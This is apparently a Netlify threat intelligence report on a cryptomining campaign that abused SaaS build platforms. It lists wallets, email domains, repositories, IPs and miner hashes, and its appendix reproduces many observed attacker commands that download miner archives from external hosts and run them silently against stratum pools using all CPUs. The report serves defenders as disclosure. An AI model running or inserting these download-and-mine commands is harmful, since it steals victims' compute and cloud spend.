In recent months, the threat intelligence team at Netlify has observed an abusive cryptominer campaign targeting the SaaS industry. The aim of the campaign has been to mine cryptocurrencies optimized for CPU-based mining by abusing cloud SaaS infrastructure. The goal of this report is to share details about the observed campaign to the wider information security community, so companies can enhance their defenses against such abuse.
Netlify is committed to uncovering threats that affect the wider industry. Our hope is that the protections we employ to secure our customers’ data will be used by our partners and colleagues throughout the industry to make the web a safer place for all.
Campaign timeframe
The cryptomining campaign discussed in this report was found to be operating in several waves of activity, the first ramping up slowly throughout September 2024, peaking and pausing around the beginning of October. Several waves of quicker rampups were observed beginning mid-October into early-November, ceasing completely around November 10, 2024.
Based on the wallet addresses associated with the campaign (discussed below), activity from this campaign has likely occurred in some form since July 2021, with a larger spike in activity seen throughout 2023 and 2024.
An evolving campaign
During the recently observed waves of the campaign, seven repositories have been used to download and execute cryptomining binaries on target systems. Over the course of the campaign the execution stages evolved several times, likely in an attempt to evade detection. Ultimately, execution has consisted of downloading a cryptominer binary and running said binary with parameters pointed to one of seven wallets and four IPv4 addresses associated with the campaign. During the recent waves of activity, mining was centered around TideCoin, later shifting to VerusCoin. Execution payloads have varied from one to three stages throughout the observed campaign.
The following illustration describes at a high level the campaign’s execution strategy. A detailed description of all discovered execution stages and variations are included in the appendix of this report.
Associated email address and domains
Analysis has uncovered more than 3200 email addresses associated with the cryptominer campaign. Less than 250 of these addresses were associated with GMail and Office 365 email addresses, with the majority of email addresses being associated with six custom domain names. Detail of these domains is included in the appendix of this report. Email addresses used for account signups used the pattern `prefix`+`random_string`@`domain`[.]`com`. The plus sign (+) is a common sub-addressing method supported by many email providers, allowing for multiple unique email addresses that act as extensions of the primary email address.
In total, 46 unique email addresses were used to generate the approximately 3200 sub-addressed email addresses. It is assumed that multiple accounts were attempted for creation to produce greater concurrent CPU mining capacity.
Activity associated with these email addresses has originated from a variety of IP address blocks, with 74% being associated with various cloud providers and 64% being associated with Microsoft cloud networks. The following table describes the organizational ownership of IP address blocks discovered to be originating traffic for the abusive email addresses.
| Organization | Account signup occurrences |
|---|---|
| Microsoft | 2442 |
| Pt Telkom Indonesia | 383 |
| Protonvpn | 64 |
| Datacamp | 60 |
| OVH | 16 |
| Leaseweb | 13 |
| Other | 274 |
How successful has their campaign against the industry been?
A total of seven active wallets were used in the campaign, with mining activities focused on VerusCoin, TideCoin, and Sugarchain, all of which are cryptocurrencies designed to be mined on CPU-based hardware. An eighth wallet was also identified in the format of a VerusCoin blockchain hash, but its address could not be found on the VerusCoin blockchain explorer.
In total across the lifetime of all wallets, around $6,500 in cryptocurrency was mined, based on the conversion rates at the time of this writing in December 2024. It is estimated, based on the activity volume of these wallets, that it may cost upwards of $20,000 - $30,000 a month in cloud spend, during months when the campaign was active. That total represents wasted spend across all victims targeted in this cryptomining campaign. Since many cloud platforms offer various free-tier plans with access to some level of cloud compute resources, the compute cost to the abusive campaign is likely close to $0.
A summary of the wallets discovered are as follows:
| Wallet | Coin | Earliest transaction | Total balance transfers * | USD equivalent * |
|---|---|---|---|---|
| RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii | VerusCoin | 2021-07-21 | 127.40519181 VRSC | $806.47 |
| RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c | VerusCoin | 2023-09-10 | 429.83822009 VRSC | $2,720.88 |
| RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs | VerusCoin | 2024-10-13 | 0.00293549 VRSC | $0.02 |
| TWmRFcspf257KLgehukxHPdc1pf6g8PDz9 | TideCoin | 2023-03-10 | 9214.75307631 TDC | $1,773.41 |
| TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW | TideCoin | 2024-10-02 | 1446.54011315 TDC | $278.39 |
| sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp | SugarChain | 2024-07-21 | 1326346.16288581 SUGAR | $346.27 |
| sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj | SugarChain | 2024-10-26 | 2226232.43760123 SUGAR | $581.20 |
* The total wallet balance transfers and USD rate conversions may change over time.
Conclusion
This report discusses a cryptominer campaign aimed at abusing cloud compute resources. This particular campaign appears to have been active as early as 2021, with a large uptick in activity taking place throughout 2023 and 2024. Following this conclusion, additional technical details about the campaign are provided as a resource to information security teams tasked with defending against such abuse.
Questions about this report can be directed to Netlify Security at security@netlify.com.
Appendix: Additional technical details
Repositories associated with the cryptominer campaign
| Repository | Occurrences observed |
|---|---|
| bitbucket[.]org/betbeyw/titied | 163,225 |
| gitlab[.]com/mantap7091041/node | 129,570 |
| bitbucket[.]org/awrbtaehtaey/bluise | 19,304 |
| gitlab[.]com/mantap7091041/gas | 5,731 |
| bitbucket[.]org/oaebthoae/bluise | 4,367 |
| gitlab[.]com/mantap7091041/nodejs | 487 |
| bitbucket[.]org/dtmdtn/bluise | 45 |
Email domains used in the cryptominer campaign
| Email domain | Occurrences observed | Domain registrar | Domain registration date |
|---|---|---|---|
| butyusa[.]com | 1517 | Hostinger | 2023-05-23 |
| gyuil[.]com | 801 | WebNIC | 2024-02-04 |
| gimaul[.]com | 343 | WebNIC | 2024-01-31 |
| qmaul[.]com | 247 | IDWebHost | 2023-12-25 |
| gmail[.]com | 211 | n/a | n/a |
| zaknim[.]com | 45 | Hostinger | 2023-07-17 |
| outlook[.]com | 29 | n/a | n/a |
| gsweety[.]com | 7 | WebNIC | 2024-01-26 |
IPv4 addresses associated with the cryptominer campaign
| IPv4 address | ASN | Location |
|---|---|---|
| 8.215.4.141 | AS45102 Alibaba (US) Technology Co., Ltd. | Jakarta, Indonesia |
| 8.219.2.132 | AS45102 Alibaba (US) Technology Co., Ltd. | Jakarta, Indonesia |
| 47.236.252.96 | AS45102 Alibaba (US) Technology Co., Ltd. | Singapore |
| 178.128.218.13 | AS14061 DigitalOcean, LLC | Singapore |
Cryptominer binaries used in the campaign
| Binary | Coin | SHA1 | Identifier |
|---|---|---|---|
| hell | VerusCoin | 86cdddf21f0b3071dcff753fd9db19012fd132f6 | ---------------------------------------------------------------------- Hellminer 0.59.1 [VerusHash 2.2 + PBaaS] Linux ---------------------------------------------------------------------- |
| capeu | TideCoin | 3b8821981d55d791b0283098c7c827450f69ce19 | ********** cpuminer-rplant 5.0.36L-sse2 *********** |
| cjava | TideCoin | d7445ca0d10b6a89cf6eeaf056081bc7daf18d26 | ********** cpuminer-rplant 5.0.27L-avx2 *********** |
| sumaker | SugarChain | 5b1855a378dfba329d60764788d52eba556545c7 | *** sugarmaker 2.5.0-sugar4 by Kanon *** Multi-threaded CPU miner for Sugarchain and other Yespower variants |
Detailed view of the execution stages used in the cryptominer campaign
Repository: git@bitbucket[.]org:awrbtaehtaey/bluise
Date Range: 2024-11-05 to 2024-11-08
Associated Wallets:
- RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
- RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c
Coins Mined:
- VerusCoin
Endpoints:
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate
Stage 2: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> node info.js && yarn generate
>> yarn generate && node info.js
>> node info.js
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
Stage 3: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> node info.js
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Repository: git@bitbucket[.]org:oaebthoae/bluise
Date Range: 2024-11-05 to 2024-11-08
Associated Wallets:
- RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
- RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c
Coins Mined:
- VerusCoin
Endpoints:
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official > /dev/null 2>&1 && yarn generate
Stage 2: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> node info.js && yarn generate
>> yarn generate && node info.js
>> node info.js
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 1m ./official
>> wget -q https://x0[.]at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
Stage 3: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> node info.js
Stage 2: Source: node info.js
Commands observed:
>> wget -q https://bitbucket.org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
>> wget -q https://bitbucket.org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Repository: git@bitbucket[.]org:betbeyw/titied
Date Range: 2024-10-22 to 2024-11-05
Associated Wallets:
- RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c
- RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii
- sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj
- TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:443
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> npm run build && ./next
>> npm run build && chmod +x next && ./next
>> chmod +x next && ./next
Stage 2: Source: ./next
Commands observed:
- Bash script:
wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz
echo ""Downloaded sumaker""
tar -xf titied.tar.gz
echo ""Running sumaker for 2 minutes""
timeout 10m ./gas > /dev/null 2>&1
echo ""sumaker finished, starting npm run build""
npm run build"
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
Variation B
Stage 1: Source: CI/CD
>> node data.js
Stage 2: Source: node data.js
>> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 10m ./gas > /dev/null 2>&1
Stage 3: Source: ./gas
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://gitlab[.]com/maximus.sale1/file/-/raw/main/sumaker.tar.gz && tar -xf sumaker.tar.gz && timeout 10m ./gas > /dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qkjclufxaj7zvw7686sr589mpklrp3k858hqudj.lol -t $(nproc --all)
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 10m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Variation E
Stage 1: Source: CI/CD
Commands observed:
>> node data.js && npm run build
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/kontolkaudek/file/raw/main/titied.tar.gz && tar -xf titied.tar.gz && timeout 15m ./gas > /dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TSpv8cQeM7jdt9D8FkWfh6ru7SWtV2aiXW.gas -p x -t $(nproc --all)
Variation F
Stage 1: Source: CI/CD
Commands observed:
>> node data.js && npm run build
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./nano > /dev/null 2>&1
Stage 3: Source: ./nano
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RSxdUnFbKxcJQ46pVn5fUM5Yn4UVtdCf6c.arsenal -p x --cpu $(nproc --all)
Variation G
Stage 1: Source: CI/CD
Commands observed:
>> node data.js && npm run build
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all) > /dev/null 2>&1';
Variation H
Stage 1: Source: CI/CD
Commands observed:
>> npm run build && node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://x0.at/zKnF.zip && unzip zKnF.zip && chmod +x official hell verus-solver && timeout 15m ./official
Stage 3: Source: ./official
Commands observed:
>> ./hell -c stratum+tcp://8.219.2.132:80 -u RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii.arsenal -p x --cpu $(nproc --all)
Repository: git@gitlab[.]com:mantap7091041/nodejs
Date Range: 2024-09-27 to 2024-11-04
Associated Wallets:
- R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU
- RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
- sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
- TWmRFcspf257KLgehukxHPdc1pf6g8PDz9
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 47.236.252.96:443
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:80
- stratum+tcp://8.215.4.141:443
- stratum+tcp://8.219.2.132:80
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation E
Stage 1: Source: CI/CD
Commands observed:
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation F
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget https://gitlab[.]com/mantap7091041/gas/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation G
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation H
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> wget -q https://bitbucket[.]org/levyxd/filess/raw/main/vipor.tar.gz && tar -xf vipor.tar.gz && timeout 15m ./hell -c stratum+tcp://8.219.2.132:80 -u R9sx8KeC2qeGfpvC4GXiXoxkA5KEYE7wYU.yesss -p x --cpu $(nproc --all) > /dev/null 2>&1
Repository: git@gitlab[.]com:mantap7091041/node
Date Range: 2024-09-27 to 2024-10-28
Associated Wallets:
- RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
- sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
- TWmRFcspf257KLgehukxHPdc1pf6g8PDz9
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 47.236.252.96:443
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:80
- stratum+tcp://8.215.4.141:443
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Variation E
Stage 1: Source: CI/CD
Commands observed:
>> node data.js
Stage 2: Source: node data.js
Commands observed:
>> unzip titied.zip && chmod +x gas && timeout 10m ./gas >/dev/null 2>&1
Stage 3: Source: ./gas
Commands observed:
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
Repository: git@gitlab[.]com:mantap7091041/gas
Date Range: 2024-09-27 to 2024-10-26
Associated Wallets:
- RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs
- sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp
- TWmRFcspf257KLgehukxHPdc1pf6g8PDz9
Coins Mined:
- SugarChain
- TideCoin
- VerusCoin
Endpoints:
- 47.236.252.96:443
- 178.128.218.13:80
- stratum+tcp://8.215.4.141:80
- stratum+tcp://8.215.4.141:443
Execution Variations
Variation A
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x sumaker && ./sumaker -a YespowerSugar -o stratum+tcp://8.215.4.141:443 -u sugar1qujaurjvd0z8vvzmsmkhfhsvmqgh3hp7dm3h5mp.speed -t $(nproc --all) > /dev/null 2>&1
Variation B
Stage 1: Source: CI/CD
Commands observed:
>> ./hell -c stratum+tcp://8.215.4.141:80 -u RREwpdM7Wnb7MEGB2xP2vjRcPKkHAraZWs.tes -p x --cpu $(nproc --all)
Variation C
Stage 1: Source: CI/CD
Commands observed:
>> chmod +x cjava && nohup ./cjava -a yespowertide -o 47.236.252.96:443 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.$(echo SG2-$(TZ=UTC-7 date +"%H-%M-%S")) -p -x -t $(nproc --all) >/dev/null 2>&1
Variation D
Stage 1: Source: CI/CD
Commands observed:
>> apt install unzip && wget https://gitlab[.]com/colaymanku/tille/-/raw/main/titied.zip && unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
>> unzip titied.zip && chmod +x gas && ./gas >/dev/null 2>&1
Stage 2: Source: ./gas
>> chmod +x capeu && ./capeu -a yespowertide -o 178.128.218.13:80 -u TWmRFcspf257KLgehukxHPdc1pf6g8PDz9.yesss -p x -t $(nproc --all)
